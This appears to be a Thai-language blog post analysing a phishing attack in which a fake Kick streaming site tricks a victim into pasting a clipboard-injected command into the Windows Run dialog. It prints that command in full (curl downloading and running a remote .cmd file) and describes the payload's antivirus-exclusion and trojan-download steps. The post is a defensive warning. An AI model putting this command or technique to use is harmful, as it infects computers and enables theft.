เมื่อเช้านี้ฉันเห็นบันทึกการสนทนาในหลายกลุ่ม เป็นเรื่องเกี่ยวกับชายชราคนหนึ่งที่ไปที่เว็บไซต์ฟิชชิ่งปลอมและคอมพิวเตอร์ของเขาติดม้าโทรจันและทรัพย์สินของเขาถูกขโมย มาวิเคราะห์กระบวนการที่เขาถูกขโมยกันดีกว่า
ดังที่แสดงในบันทึกการแชทด้านบน เขาเยี่ยมชมเว็บไซต์เตะปลอมด้วย URL ต่อไปนี้: https://kick.com.im/
คำเตือนที่สำคัญ: นี่เป็นเว็บไซต์ฟิชชิ่ง อย่าเข้าชม! - - นี่เป็นเว็บไซต์ฟิชชิ่ง ห้ามเข้าชม! - - นี่เป็นเว็บไซต์ฟิชชิ่ง ห้ามเข้าชม! - -
เมื่อเราเยี่ยมชมเว็บไซต์นี้ เราพบว่าจะมีการยืนยันว่าเป็นมนุษย์หรือไม่ เมื่อเราคลิกเพื่อตรวจสอบ ข้อความต่อไปนี้จะปรากฏขึ้น:
มาอธิบายว่าภาพด้านบนขอให้คุณทำอะไร:
1. กด Windows+R เพื่อเปิดกล่องโต้ตอบเรียกใช้
Windows+R เป็นคำสั่งทางลัดภายใต้ระบบ Windows ซึ่งใช้เพื่อเปิดกล่องโต้ตอบเรียกใช้อย่างรวดเร็ว นี่คือที่ที่คุณเตรียมพร้อมที่จะเรียกใช้ไฟล์สคริปต์ที่เป็นอันตราย
2. กด CTRL+V เพื่อวางข้อความยืนยัน
ทุกคนบนโลกรู้ดีว่า CTRL+V ใช้สำหรับการวาง คุณมีคำถามใดๆ ในขั้นตอนนี้หรือไม่ ก่อน CTRL+V คุณต้องกด CTRL+C เพื่อคัดลอก
มาดูโค้ดส่วนหน้าของเว็บไซต์ฟิชชิ่งกัน:
เคล็ดลับอยู่ที่นี่ โปรดจำไว้ว่าเมื่อเราเยี่ยมชมเว็บไซต์ครั้งแรกเราถูกขอให้ตรวจสอบว่าเราเป็นมนุษย์หรือไม่ เพื่อยืนยัน เราต้องคลิกโค้ดด้านบนเพื่อตรวจจับเหตุการณ์การคลิกเมาส์ พบสคริปต์ที่เป็นอันตรายจะถูกคัดลอกไปยังเพสต์บอร์ดโดยอัตโนมัติ ในเวลานี้คุณสามารถกด CTRL+V ได้โดยตรงโดยไม่ต้องใช้ CTRL+C
แล้วโค้ดที่เป็นอันตรายในพาสบอร์ดคืออะไร?
cmd /c curl -k -L -Ss https://hcaptcha.ru/r -o %TEMP%\ 1.cmd %TEMP%\ 1.cmd # กด OK หรือ ENTER เพื่อทำการตรวจสอบให้เสร็จสิ้น การกดตกลงแสดงว่าคุณไม่ใช่หุ่นยนต์
โค้ดข้างต้นหมายถึงจาก https://hcaptcha.ru/r ( คำเตือนที่สำคัญ: นี่คือเว็บไซต์ฟิชชิ่ง ห้ามเยี่ยมชม!!! นี่คือเว็บไซต์ฟิชชิ่ง ห้ามเยี่ยมชม!!! นี่คือเว็บไซต์ฟิชชิ่ง อย่าไปเยี่ยมมัน!!! ) ดาวน์โหลดไฟล์และบันทึกลงในไดเร็กทอรีชั่วคราว ชื่อไฟล์คือ 1.cmd จากนั้นจึงรันไฟล์นี้
เปิดไฟล์ที่ดาวน์โหลดมาและค้นหารหัสต่อไปนี้:
โค้ดที่เป็นอันตรายนี้จะตรวจสอบก่อนว่าคุณมีสิทธิ์ของผู้ดูแลระบบหรือไม่ หากคุณมีสิทธิ์ของผู้ดูแลระบบ โค้ดจะพยายามยกระดับสคริปต์ให้เป็นสิทธิ์ของผู้ดูแลระบบ
ส่วนที่สองของโค้ดถูกเข้ารหัสใน Base 64 และเมื่อถอดรหัสพบว่าไม่รวม C:\ จากการสแกนไวรัส จุดประสงค์ของขั้นตอนนี้คือเพื่อบอกซอฟต์แวร์ป้องกันไวรัสว่า C:|อย่าสแกน! เพื่อว่าเมื่อมีการเรียกใช้โทรจันบนไดรฟ์ C ซอฟต์แวร์ป้องกันไวรัสจะไม่ค้นพบมัน
ส่วนที่สามของโค้ด gpt ยังไม่ได้รับการแยกวิเคราะห์ วัตถุประสงค์ทั่วไปคือการดาวน์โหลดโทรจันจากเว็บไซต์ไปยังไดรฟ์ C จากนั้นจึงเรียกใช้งานโทรจัน ซึ่งจำเป็นต้อง มีการวิเคราะห์โดยละเอียดโดยผู้เชี่ยวชาญด้านความปลอดภัย เช่น @evilcos
เราสามารถได้รับประสบการณ์ต่อไปนี้จากการหลอกลวงแบบฟิชชิ่งข้างต้น:
1. ก่อนที่จะเข้าถึงเว็บไซต์ที่ไม่คุ้นเคย โปรดตรวจสอบความถูกต้องของเว็บไซต์ก่อน เช่นเดียวกับเหยื่อด้านบนที่เข้าใจผิดว่าเว็บไซต์ฟิชชิ่งเป็น URL ถ่ายทอดสดของ Kick คือ https://kick.com/ หากเหยื่อค้นหาใน Google หรือถามถึง GPT เขาจะไม่โดนหลอก
2. เราต้องระมัดระวังก่อนดำเนินการแต่ละครั้ง เราต้องเข้าใจ วัตถุประสงค์ของการดำเนินการนี้ เมื่อเราไม่เข้าใจ หรือไม่ชัดเจน เราต้องใช้เครื่องมือ AI เช่น GPT ได้ดี
Web3 เต็มไปด้วยกับดัก และฉันหวังว่าทุกคนจะสามารถหลีกเลี่ยงมันได้
